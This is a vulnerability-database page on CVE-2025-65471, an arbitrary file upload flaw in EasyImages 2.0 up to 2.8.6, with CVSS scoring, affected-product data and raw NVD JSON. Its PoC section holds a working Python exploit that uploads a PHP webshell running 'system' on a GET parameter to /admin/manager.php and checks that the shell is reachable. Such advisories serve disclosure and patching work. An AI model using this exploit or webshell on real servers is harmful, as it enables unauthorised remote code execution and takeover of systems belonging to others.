Security Vulnerability Report
中文
CVE-2025-65471 CVSS 8.8 HIGH

CVE-2025-65471

Published: 2025-12-11 17:15:58
Last Modified: 2025-12-18 21:15:57

Description

An arbitrary file upload vulnerability in the /admin/manager.php component of EasyImages 2.0 v2.8.6 and below allows attackers to execute arbitrary code via uploading a crafted PHP file.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:easyimages2.0_project:easyimages2.0:*:*:*:*:*:*:*:* - VULNERABLE
EasyImages 2.0 <= 2.8.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-65471 PoC - EasyImages 2.0 Arbitrary File Upload # Target: EasyImages <= 2.8.6 # Component: /admin/manager.php def exploit(target_url, webshell_content): """ Exploit arbitrary file upload vulnerability in EasyImages 2.0 Upload a malicious PHP file to achieve RCE """ upload_url = f"{target_url.rstrip('/')}/admin/manager.php" # Prepare the malicious PHP file files = { 'file': ('shell.php', webshell_content, 'image/php') } # Additional fields that might be required data = { 'action': 'upload', 'dir': '/' } try: response = requests.post(upload_url, files=files, data=data, timeout=10) # Check if upload was successful if response.status_code == 200: print(f"[+] File uploaded successfully!") print(f"[+] Response: {response.text}") # Try to access the uploaded shell shell_path = f"{target_url.rstrip('/')}/uploads/shell.php" shell_check = requests.get(shell_path, timeout=10) if shell_check.status_code == 200: print(f"[+] Webshell accessible at: {shell_path}") return True else: print(f"[-] Upload failed with status: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url>") print(f"Example: python {sys.argv[0]} http://target.com/easyimages") sys.exit(1) target = sys.argv[1] # Simple webshell for demonstration webshell = "<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>" exploit(target, webshell)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65471", "sourceIdentifier": "[email protected]", "published": "2025-12-11T17:15:57.720", "lastModified": "2025-12-18T21:15:56.813", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "An arbitrary file upload vulnerability in the /admin/manager.php component of EasyImages 2.0 v2.8.6 and below allows attackers to execute arbitrary code via uploading a crafted PHP file."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:easyimages2.0_project:easyimages2.0:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.8.6", "matchCriteriaId": "16A66E44-451D-43B8-970B-2CB98E4E11CC"}]}]}], "references": [{"url": "https://congsec.cn/?id=20251102153546-i712jss", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://gist.github.com/CongSec/cd3d3ee57b8e6f83c7038e2263c15120", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}